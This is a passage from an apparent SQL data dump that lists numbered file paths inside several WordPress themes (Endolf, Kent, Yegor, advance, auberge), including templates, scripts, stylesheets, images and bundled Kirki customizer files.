f/js/custom.js'),(1715,'wp-content/themes/Endolf/js/jquery.flexslider.js'),(1716,'wp-content/themes/Endolf/js/navigation.js'),(1717,'wp-content/themes/Endolf/js/skip-link-focus-fix.js'),(1718,'wp-content/themes/Endolf/js/tinynav.js'),(1719,'wp-content/themes/Endolf/js/vticker.js'),(1720,'wp-content/themes/Endolf/page.php'),(1721,'wp-content/themes/Endolf/search.php'),(1722,'wp-content/themes/Endolf/sidebar.php'),(1723,'wp-content/themes/Endolf/single.php'),(1724,'wp-content/themes/Endolf/sponsors.php'),(1725,'wp-content/themes/Kent/404.php'),(1726,'wp-content/themes/Kent/FT/FT_scope.php'),(1727,'wp-content/themes/Kent/FT/colors.php'),(1728,'wp-content/themes/Kent/FT/inc/lessc.php'),(1729,'wp-content/themes/Kent/FT/js/colorset.js'),(1730,'wp-content/themes/Kent/FT/js/jquery.minicolors.min.js'),(1731,'wp-content/themes/Kent/FT/license-html.php'),(1732,'wp-content/themes/Kent/FT/options/banners.php'),(1733,'wp-content/themes/Kent/FT/options/options.php'),(1734,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-framework-admin.php'),(1735,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-framework.php'),(1736,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-interface.php'),(1737,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-media-uploader.php'),(1738,'wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-sanitization.php'),(1739,'wp-content/themes/Kent/FT/plugin/options-framework/js/media-uploader.js'),(1740,'wp-content/themes/Kent/FT/plugin/options-framework/js/options-custom.js'),(1741,'wp-content/themes/Kent/FT/plugin/options-framework/options-framework.php'),(1742,'wp-content/themes/Kent/FT/plugin/updater.php'),(1743,'wp-content/themes/Kent/aq_resizer.php'),(1744,'wp-content/themes/Kent/archive.php'),(1745,'wp-content/themes/Kent/comments.php'),(1746,'wp-content/themes/Kent/content-page.php'),(1747,'wp-content/themes/Kent/content-single.php'),(1748,'wp-content/themes/Kent/content.php'),(1749,'wp-content/themes/Kent/footer.php'),(1750,'wp-content/themes/Kent/ft-options.php'),(1751,'wp-content/themes/Kent/functions.php'),(1752,'wp-content/themes/Kent/guide.php'),(1753,'wp-content/themes/Kent/header.php'),(1754,'wp-content/themes/Kent/inc/paginate.php'),(1755,'wp-content/themes/Kent/inc/template-tags.php'),(1756,'wp-content/themes/Kent/index.php'),(1757,'wp-content/themes/Kent/js/custom.js'),(1758,'wp-content/themes/Kent/js/html5.js'),(1759,'wp-content/themes/Kent/js/jquery.flexslider.js'),(1760,'wp-content/themes/Kent/js/superfish.js'),(1761,'wp-content/themes/Kent/no-results.php'),(1762,'wp-content/themes/Kent/page.php'),(1763,'wp-content/themes/Kent/search.php'),(1764,'wp-content/themes/Kent/searchform.php'),(1765,'wp-content/themes/Kent/sidebar.php'),(1766,'wp-content/themes/Kent/single.php'),(1767,'wp-content/themes/Kent/slider.php'),(1768,'wp-content/themes/Kent/sponsors.php'),(1769,'wp-content/themes/Kent/tabs.php'),(1770,'wp-content/themes/Kent/timthumb.php'),(1771,'wp-content/themes/Yegor/404.php'),(1772,'wp-content/themes/Yegor/FT/FT_scope.php'),(1773,'wp-content/themes/Yegor/FT/colors.php'),(1774,'wp-content/themes/Yegor/FT/inc/lessc.php'),(1775,'wp-content/themes/Yegor/FT/js/colorset.js'),(1776,'wp-content/themes/Yegor/FT/js/jquery.minicolors.min.js'),(1777,'wp-content/themes/Yegor/FT/license-html.php'),(1778,'wp-content/themes/Yegor/FT/options/banners.php'),(1779,'wp-content/themes/Yegor/FT/options/options.php'),(1780,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-framework-admin.php'),(1781,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-framework.php'),(1782,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-interface.php'),(1783,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-media-uploader.php'),(1784,'wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-sanitization.php'),(1785,'wp-content/themes/Yegor/FT/plugin/options-framework/js/media-uploader.js'),(1786,'wp-content/themes/Yegor/FT/plugin/options-framework/js/options-custom.js'),(1787,'wp-content/themes/Yegor/FT/plugin/options-framework/options-framework.php'),(1788,'wp-content/themes/Yegor/FT/plugin/updater.php'),(1789,'wp-content/themes/Yegor/aq_resizer.php'),(1790,'wp-content/themes/Yegor/archive.php'),(1791,'wp-content/themes/Yegor/bootstrap/bootstrap.min.js'),(1792,'wp-content/themes/Yegor/comments.php'),(1793,'wp-content/themes/Yegor/content-page.php'),(1794,'wp-content/themes/Yegor/content-single.php'),(1795,'wp-content/themes/Yegor/content.php'),(1796,'wp-content/themes/Yegor/footer.php'),(1797,'wp-content/themes/Yegor/ft-options.php'),(1798,'wp-content/themes/Yegor/functions.php'),(1799,'wp-content/themes/Yegor/guide.php'),(1800,'wp-content/themes/Yegor/header.php'),(1801,'wp-content/themes/Yegor/inc/carousal.php'),(1802,'wp-content/themes/Yegor/inc/extras.php'),(1803,'wp-content/themes/Yegor/inc/paginate.php'),(1804,'wp-content/themes/Yegor/inc/tabs.php'),(1805,'wp-content/themes/Yegor/inc/template-tags.php'),(1806,'wp-content/themes/Yegor/index.php'),(1807,'wp-content/themes/Yegor/js/custom.js'),(1808,'wp-content/themes/Yegor/js/flexslider.js'),(1809,'wp-content/themes/Yegor/js/jquery.carouFredSel-6.2.1-packed.js'),(1810,'wp-content/themes/Yegor/js/mobilemenu.js'),(1811,'wp-content/themes/Yegor/js/navigation.js'),(1812,'wp-content/themes/Yegor/no-results.php'),(1813,'wp-content/themes/Yegor/page.php'),(1814,'wp-content/themes/Yegor/search.php'),(1815,'wp-content/themes/Yegor/searchform.php'),(1816,'wp-content/themes/Yegor/sidebar.php'),(1817,'wp-content/themes/Yegor/single.php'),(1818,'wp-content/themes/Yegor/sponsors.php'),(1819,'wp-content/themes/advance/404.php'),(1820,'wp-content/themes/advance/archive.php'),(1821,'wp-content/themes/advance/author.php'),(1822,'wp-content/themes/advance/category.php'),(1823,'wp-content/themes/advance/comments.php'),(1824,'wp-content/themes/advance/content-none.php'),(1825,'wp-content/themes/advance/content-single.php'),(1826,'wp-content/themes/advance/content.php'),(1827,'wp-content/themes/advance/css/advance-mobile.css'),(1828,'wp-content/themes/advance/css/advance_widgets_custom_css.css'),(1829,'wp-content/themes/advance/css/animate.css'),(1830,'wp-content/themes/advance/css/customcss/body_layout.css'),(1831,'wp-content/themes/advance/css/customcss/header_checkbox.css'),(1832,'wp-content/themes/advance/css/customcss/mobile_sidebar.css'),(1833,'wp-content/themes/advance/css/customcss/mobile_slider.css'),(1834,'wp-content/themes/advance/css/customcss/sticky_menu.css'),(1835,'wp-content/themes/advance/css/foundation.css'),(1836,'wp-content/themes/advance/css/jquery.sidr.dark.css'),(1837,'wp-content/themes/advance/css/preloder.css'),(1838,'wp-content/themes/advance/css/unminified/animate.css'),(1839,'wp-content/themes/advance/css/unminified/foundation.css'),(1840,'wp-content/themes/advance/css/unminified/jquery.sidr.dark.css'),(1841,'wp-content/themes/advance/css/unminified/normalize.css'),(1842,'wp-content/themes/advance/css/welcome-page.css'),(1843,'wp-content/themes/advance/footer/part-footer1.php'),(1844,'wp-content/themes/advance/footer.php'),(1845,'wp-content/themes/advance/front-page.php'),(1846,'wp-content/themes/advance/functions.php'),(1847,'wp-content/themes/advance/header.php'),(1848,'wp-content/themes/advance/headers/part-head1.php'),(1849,'wp-content/themes/advance/headers/part-headsingle.php'),(1850,'wp-content/themes/advance/images/big-shadow.png'),(1851,'wp-content/themes/advance/images/blank1.jpg'),(1852,'wp-content/themes/advance/images/ico-delete.png'),(1853,'wp-content/themes/advance/images/lay_hover.png'),(1854,'wp-content/themes/advance/images/link.png'),(1855,'wp-content/themes/advance/images/list_type.png'),(1856,'wp-content/themes/advance/images/logosaf.png'),(1857,'wp-content/themes/advance/images/rps_arrows.png'),(1858,'wp-content/themes/advance/images/search.png'),(1859,'wp-content/themes/advance/images/sep-shadow.png'),(1860,'wp-content/themes/advance/images/shadow.png'),(1861,'wp-content/themes/advance/images/slider.jpg'),(1862,'wp-content/themes/advance/images/ui.totop.png'),(1863,'wp-content/themes/advance/images/work_img1.jpg'),(1864,'wp-content/themes/advance/inc/admin/img/1.png'),(1865,'wp-content/themes/advance/inc/admin/img/2.png'),(1866,'wp-content/themes/advance/inc/admin/img/3.png'),(1867,'wp-content/themes/advance/inc/admin/img/fron-widgest.jpg'),(1868,'wp-content/themes/advance/inc/admin/img/service.jpg'),(1869,'wp-content/themes/advance/inc/admin/welcome-screen/sections/getting-started.php'),(1870,'wp-content/themes/advance/inc/admin/welcome-screen/welcome-screen.php'),(1871,'wp-content/themes/advance/inc/customizer/config.php'),(1872,'wp-content/themes/advance/inc/customizer/fields.php'),(1873,'wp-content/themes/advance/inc/customizer/panels.php'),(1874,'wp-content/themes/advance/inc/customizer/sections.php'),(1875,'wp-content/themes/advance/inc/customizer.php'),(1876,'wp-content/themes/advance/inc/images/cross.png'),(1877,'wp-content/themes/advance/inc/images/ico-delete.png'),(1878,'wp-content/themes/advance/inc/images/layout1.png'),(1879,'wp-content/themes/advance/inc/images/layout2.png'),(1880,'wp-content/themes/advance/inc/images/tick.png'),(1881,'wp-content/themes/advance/inc/kirki/Gruntfile.js'),(1882,'wp-content/themes/advance/inc/kirki/LICENSE'),(1883,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-colors.php'),(1884,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-width.php'),(1885,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css.php'),(1886,'wp-content/themes/advance/inc/kirki/assets/css/customizer.css'),(1887,'wp-content/themes/advance/inc/kirki/assets/css/customizer.css.map'),(1888,'wp-content/themes/advance/inc/kirki/assets/css/hint.css'),(1889,'wp-content/themes/advance/inc/kirki/assets/css/kirki-styles.css'),(1890,'wp-content/themes/advance/inc/kirki/assets/css/select2.min.css'),(1891,'wp-content/themes/advance/inc/kirki/assets/css/transparency-grid.png'),(1892,'wp-content/themes/advance/inc/kirki/assets/images/1c.png'),(1893,'wp-content/themes/advance/inc/kirki/assets/images/2cl.png'),(1894,'wp-content/themes/advance/inc/kirki/assets/images/2cr.png'),(1895,'wp-content/themes/advance/inc/kirki/assets/images/3cl.png'),(1896,'wp-content/themes/advance/inc/kirki/assets/images/3cm.png'),(1897,'wp-content/themes/advance/inc/kirki/assets/images/3cr.png'),(1898,'wp-content/themes/advance/inc/kirki/assets/images/jquery.fs.stepper-arrows.png'),(1899,'wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.png'),(1900,'wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.svg'),(1901,'wp-content/themes/advance/inc/kirki/assets/images/kirki-logo.svg'),(1902,'wp-content/themes/advance/inc/kirki/assets/images/kirki-toolkit.png'),(1903,'wp-content/themes/advance/inc/kirki/assets/js/branding.js'),(1904,'wp-content/themes/advance/inc/kirki/assets/js/controls/checkbox.js'),(1905,'wp-content/themes/advance/inc/kirki/assets/js/controls/code.js'),(1906,'wp-content/themes/advance/inc/kirki/assets/js/controls/color-palette.js'),(1907,'wp-content/themes/advance/inc/kirki/assets/js/controls/color.js'),(1908,'wp-content/themes/advance/inc/kirki/assets/js/controls/custom.js'),(1909,'wp-content/themes/advance/inc/kirki/assets/js/controls/dashicons.js'),(1910,'wp-content/themes/advance/inc/kirki/assets/js/controls/date.js'),(1911,'wp-content/themes/advance/inc/kirki/assets/js/controls/dimension.js'),(1912,'wp-content/themes/advance/inc/kirki/assets/js/controls/dropdown-pages.js'),(1913,'wp-content/themes/advance/inc/kirki/assets/js/controls/editor.js'),(1914,'wp-content/themes/advance/inc/kirki/assets/js/controls/generic.js'),(1915,'wp-content/themes/advance/inc/kirki/assets/js/controls/multicheck.js'),(1916,'wp-content/themes/advance/inc/kirki/assets/js/controls/multicolor.js'),(1917,'wp-content/themes/advance/inc/kirki/assets/js/controls/number.js'),(1918,'wp-content/themes/advance/inc/kirki/assets/js/controls/palette.js'),(1919,'wp-content/themes/advance/inc/kirki/assets/js/controls/preset.js'),(1920,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio-buttonset.js'),(1921,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio-image.js'),(1922,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio.js'),(1923,'wp-content/themes/advance/inc/kirki/assets/js/controls/repeater.js'),(1924,'wp-content/themes/advance/inc/kirki/assets/js/controls/select.js'),(1925,'wp-content/themes/advance/inc/kirki/assets/js/controls/slider.js'),(1926,'wp-content/themes/advance/inc/kirki/assets/js/controls/sortable.js'),(1927,'wp-content/themes/advance/inc/kirki/assets/js/controls/spacing.js'),(1928,'wp-content/themes/advance/inc/kirki/assets/js/controls/switch.js'),(1929,'wp-content/themes/advance/inc/kirki/assets/js/controls/toggle.js'),(1930,'wp-content/themes/advance/inc/kirki/assets/js/controls/typography.js'),(1931,'wp-content/themes/advance/inc/kirki/assets/js/functions/set-setting-value.js'),(1932,'wp-content/themes/advance/inc/kirki/assets/js/functions/validate-css-value.js'),(1933,'wp-content/themes/advance/inc/kirki/assets/js/l10n.js'),(1934,'wp-content/themes/advance/inc/kirki/assets/js/postmessage.js'),(1935,'wp-content/themes/advance/inc/kirki/assets/js/reset.js'),(1936,'wp-content/themes/advance/inc/kirki/assets/js/tooltip.js'),(1937,'wp-content/themes/advance/inc/kirki/assets/js/vendor/selectize.js'),(1938,'wp-content/themes/advance/inc/kirki/assets/js/vendor/serialize.js'),(1939,'wp-content/themes/advance/inc/kirki/assets/js/vendor/tinymce.plugin.code.js'),(1940,'wp-content/themes/advance/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js'),(1941,'wp-content/themes/advance/inc/kirki/assets/scss/controls/checkbox.scss'),(1942,'wp-content/themes/advance/inc/kirki/assets/scss/controls/code.scss'),(1943,'wp-content/themes/advance/inc/kirki/assets/scss/controls/color-palette.scss'),(1944,'wp-content/themes/advance/inc/kirki/assets/scss/controls/color.scss'),(1945,'wp-content/themes/advance/inc/kirki/assets/scss/controls/dashicons.scss'),(1946,'wp-content/themes/advance/inc/kirki/assets/scss/controls/date.scss'),(1947,'wp-content/themes/advance/inc/kirki/assets/scss/controls/dimension.scss'),(1948,'wp-content/themes/advance/inc/kirki/assets/scss/controls/editor.scss'),(1949,'wp-content/themes/advance/inc/kirki/assets/scss/controls/generic.scss'),(1950,'wp-content/themes/advance/inc/kirki/assets/scss/controls/multicheck.scss'),(1951,'wp-content/themes/advance/inc/kirki/assets/scss/controls/multicolor.scss'),(1952,'wp-content/themes/advance/inc/kirki/assets/scss/controls/number.scss'),(1953,'wp-content/themes/advance/inc/kirki/assets/scss/controls/palette.scss'),(1954,'wp-content/themes/advance/inc/kirki/assets/scss/controls/radio-buttonset.scss'),(1955,'wp-content/themes/advance/inc/kirki/assets/scss/controls/radio-image.scss'),(1956,'wp-content/themes/advance/inc/kirki/assets/scss/controls/radio.scss'),(1957,'wp-content/themes/advance/inc/kirki/assets/scss/controls/repeater.scss'),(1958,'wp-content/themes/advance/inc/kirki/assets/scss/controls/select.scss'),(1959,'wp-content/themes/advance/inc/kirki/assets/scss/controls/slider.scss'),(1960,'wp-content/themes/advance/inc/kirki/assets/scss/controls/sortable.scss'),(1961,'wp-content/themes/advance/inc/kirki/assets/scss/controls/spacing.scss'),(1962,'wp-content/themes/advance/inc/kirki/assets/scss/controls/switch.scss'),(1963,'wp-content/themes/advance/inc/kirki/assets/scss/controls/toggle.scss'),(1964,'wp-content/themes/advance/inc/kirki/assets/scss/controls/typography.scss'),(1965,'wp-content/themes/advance/inc/kirki/assets/scss/customizer.scss'),(1966,'wp-content/themes/advance/inc/kirki/assets/scss/global.scss'),(1967,'wp-content/themes/advance/inc/kirki/assets/scss/panels/expanded.scss'),(1968,'wp-content/themes/advance/inc/kirki/assets/scss/sections/expanded.scss'),(1969,'wp-content/themes/advance/inc/kirki/assets/scss/sections/hover.scss'),(1970,'wp-content/themes/advance/inc/kirki/assets/scss/tooltips.scss'),(1971,'wp-content/themes/advance/inc/kirki/autoloader.php'),(1972,'wp-content/themes/advance/inc/kirki/composer.json'),(1973,'wp-content/themes/advance/inc/kirki/includes/class-kirki-active-callback.php'),(1974,'wp-content/themes/advance/inc/kirki/includes/class-kirki-config.php'),(1975,'wp-content/themes/advance/inc/kirki/includes/class-kirki-control.php'),(1976,'wp-content/themes/advance/inc/kirki/includes/class-kirki-customize-control.php'),(1977,'wp-content/themes/advance/inc/kirki/includes/class-kirki-enqueue.php'),(1978,'wp-content/themes/advance/inc/kirki/includes/class-kirki-explode-background-field.php'),(1979,'wp-content/themes/advance/inc/kirki/includes/class-kirki-field.php'),(1980,'wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts-google.php'),(1981,'wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts.php'),(1982,'wp-content/themes/advance/inc/kirki/includes/class-kirki-helper.php'),(1983,'wp-content/themes/advance/inc/kirki/includes/class-kirki-init.php'),(1984,'wp-content/themes/advance/inc/kirki/includes/class-kirki-l10n.php'),(1985,'wp-content/themes/advance/inc/kirki/includes/class-kirki-panel.php'),(1986,'wp-content/themes/advance/inc/kirki/includes/class-kirki-sanitize-values.php'),(1987,'wp-content/themes/advance/inc/kirki/includes/class-kirki-scripts-registry.php'),(1988,'wp-content/themes/advance/inc/kirki/includes/class-kirki-section.php'),(1989,'wp-content/themes/advance/inc/kirki/includes/class-kirki-selective-refresh.php'),(1990,'wp-content/themes/advance/inc/kirki/includes/class-kirki-settings.php'),(1991,'wp-content/themes/advance/inc/kirki/includes/class-kirki-toolkit.php'),(1992,'wp-content/themes/advance/inc/kirki/includes/class-kirki-values.php'),(1993,'wp-content/themes/advance/inc/kirki/includes/class-kirki.php'),(1994,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php'),(1995,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-code-control.php'),(1996,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-control.php'),(1997,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php'),(1998,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-custom-control.php'),(1999,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php'),(2000,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-date-control.php'),(2001,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php'),(2002,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php'),(2003,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-editor-control.php'),(2004,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-generic-control.php'),(2005,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(2006,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(2007,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-number-control.php'),(2008,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-palette-control.php'),(2009,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-preset-control.php'),(2010,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php'),(2011,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-control.php'),(2012,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php'),(2013,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php'),(2014,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-select-control.php'),(2015,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-slider-control.php'),(2016,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php'),(2017,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php'),(2018,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-switch-control.php'),(2019,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php'),(2020,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-typography-control.php'),(2021,'wp-content/themes/advance/inc/kirki/includes/deprecated.php'),(2022,'wp-content/themes/advance/inc/kirki/includes/dynamic-css.php'),(2023,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-checkbox.php'),(2024,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-code.php'),(2025,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-alpha.php'),(2026,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-palette.php'),(2027,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color.php'),(2028,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-custom.php'),(2029,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dashicons.php'),(2030,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-date.php'),(2031,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dimension.php'),(2032,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php'),(2033,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-editor.php'),(2034,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-generic.php'),(2035,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-group-title.php'),(2036,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-image.php'),(2037,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-kirki-generic.php'),(2038,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicheck.php'),(2039,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicolor.php'),(2040,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-number.php'),(2041,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-palette.php'),(2042,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-preset.php'),(2043,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php'),(2044,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio-image.php'),(2045,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio.php'),(2046,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select.php'),(2047,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2-multiple.php'),(2048,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2.php'),(2049,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-slider.php'),(2050,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-sortable.php'),(2051,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-spacing.php'),(2052,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-switch.php'),(2053,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-text.php'),(2054,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-textarea.php'),(2055,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-toggle.php'),(2056,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-typography.php'),(2057,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-upload.php'),(2058,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-filed-link.php'),(2059,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-filed-url.php'),(2060,'wp-content/themes/advance/inc/kirki/includes/lib/class-aricolor.php'),(2061,'wp-content/themes/advance/inc/kirki/includes/lib/class-kirki-color.php'),(2062,'wp-content/themes/advance/inc/kirki/includes/output/class-kirki-output.php'),(2063,'wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php'),(2064,'wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php'),(2065,'wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-typography.php'),(2066,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php'),(2067,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php'),(2068,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php'),(2069,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property.php'),(2070,'wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-default-panel.php'),(2071,'wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php'),(2072,'wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-icons.php'),(2073,'wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-loading.php'),(2074,'wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php'),(2075,'wp-content/themes/advance/inc/kirki/includes/sections/class-kirki-sections-default-section.php'),(2076,'wp-content/themes/advance/inc/kirki/includes/sections/class-kirki-sections-expanded-section.php'),(2077,'wp-content/themes/advance/inc/kirki/includes/sections/class-kirki-sections-hover-section.php'),(2078,'wp-content/themes/advance/inc/kirki/includes/settings/class-kirki-settings-default-setting.php'),(2079,'wp-content/themes/advance/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php'),(2080,'wp-content/themes/advance/inc/kirki/includes/styles/class-kirki-styles-customizer.php'),(2081,'wp-content/themes/advance/inc/kirki/includes/styles/class-kirki-styles-frontend.php'),(2082,'wp-content/themes/advance/inc/kirki/includes/styles/class-kirki-styles-output-css.php'),(2083,'wp-content/themes/advance/inc/kirki/includes/webfonts.php'),(2084,'wp-content/themes/advance/inc/kirki/kirki.php'),(2085,'wp-content/themes/advance/inc/kirki/package.json'),(2086,'wp-content/themes/advance/inc/upsell.php'),(2087,'wp-content/themes/advance/inc/widgets/advance_serviceblock.php'),(2088,'wp-content/themes/advance/inc/widgets/advance_welcome.php'),(2089,'wp-content/themes/advance/inc/widgets/front-posts.php'),(2090,'wp-content/themes/advance/inc/widgets/ourclient.php'),(2091,'wp-content/themes/advance/inc/widgets.php'),(2092,'wp-content/themes/advance/index.php'),(2093,'wp-content/themes/advance/js/admin.js'),(2094,'wp-content/themes/advance/js/advance-preloder.js'),(2095,'wp-content/themes/advance/js/advance-widget.js'),(2096,'wp-content/themes/advance/js/advance.js'),(2097,'wp-content/themes/advance/js/advance_other.js'),(2098,'wp-content/themes/advance/js/customizer.js'),(2099,'wp-content/themes/advance/js/halfparallax.js'),(2100,'wp-content/themes/advance/js/headerParallax.js'),(2101,'wp-content/themes/advance/js/unminified/headhesive.js'),(2102,'wp-content/themes/advance/js/unminified/jquery.easing.js'),(2103,'wp-content/themes/advance/js/unminified/jquery.matchHeight.js'),(2104,'wp-content/themes/advance/js/unminified/jquery.sidr.js'),(2105,'wp-content/themes/advance/js/unminified/jquery.smooth-scroll.js'),(2106,'wp-content/themes/advance/js/unminified/modernizr.js'),(2107,'wp-content/themes/advance/js/unminified/wow.js'),(2108,'wp-content/themes/advance/js/upsell.js'),(2109,'wp-content/themes/advance/js/welcome-page.js'),(2110,'wp-content/themes/advance/js/wow.js'),(2111,'wp-content/themes/advance/layout/part-layout1.php'),(2112,'wp-content/themes/advance/layout/part-layout2.php'),(2113,'wp-content/themes/advance/page-full_width.php'),(2114,'wp-content/themes/advance/page.php'),(2115,'wp-content/themes/advance/pagination.php'),(2116,'wp-content/themes/advance/parts/part-layout.php'),(2117,'wp-content/themes/advance/parts/salider-post.php'),(2118,'wp-content/themes/advance/parts/social-loop.php'),(2119,'wp-content/themes/advance/readme.txt'),(2120,'wp-content/themes/advance/screenshot.jpg'),(2121,'wp-content/themes/advance/search.php'),(2122,'wp-content/themes/advance/sidebar.php'),(2123,'wp-content/themes/advance/single.php'),(2124,'wp-content/themes/advance/style.css'),(2125,'wp-content/themes/advance/tag.php'),(2126,'wp-content/themes/advance/woocommerce.php'),(2127,'wp-content/themes/auberge/404.php'),(2128,'wp-content/themes/auberge/archive.php'),(2129,'wp-content/themes/auberge/assets/css/custom.css'),(2130,'wp-content/themes/auberge/assets/css/editor-style.css'),(2131,'wp-content/themes/auberge/assets/css/slick.css'),(2132,'wp-content/themes/auberge/assets/css/starter.css'),(2133,'wp-content/themes/auberge/assets/css/welcome.css'),(2134,'wp-content/themes/auberge/assets/images/header.jpg'),(2135,'wp-content/themes/auberge/assets/js/customize-preview.js'),(2136,'wp-content/themes/auberge/assets/js/scripts-global.js'),(2137,'wp-content/themes/auberge/assets/js/scripts-navigation.js'),(2138,'wp-content/themes/auberge/assets/js/skip-link-focus-fix.js'),(2139,'wp-content/themes/auberge/assets/js/vendor/imagesloaded.pkgd.js'),(2140,'wp-content/themes/auberge/assets/js/vendor/imagesloaded.pkgd.min.js'),(2141,'wp-content/themes/auberge/assets/js/vendor/slick.js'),(2142,'wp-content/themes/auberge/assets/js/vendor/slick.min.js'),(2143,'wp-content/themes/auberge/changelog.md'),(2144,'wp-content/themes/auberge/comments.php'),(2145,'wp-content/themes/auberge/documentation/css/custom.css'),(2146,'wp-content/themes/auberge/documentation/documentation.html'),(2147,'wp-content/themes/auberge/footer-credits.php'),(2148,'wp-content/themes/auberge/footer.php'),(2149,'wp-content/themes/auberge/functions.php'),(2150,'wp-content/themes/auberge/header.php'),(2151,'wp-content/themes/auberge/image.php'),(2152,'wp-content/themes/auberge/includes/custom-header/custom-header.php'),(2153,'wp-content/themes/auberge/includes/plugins/advanced-custom-fields/advanced-custom-fields.php'),(2154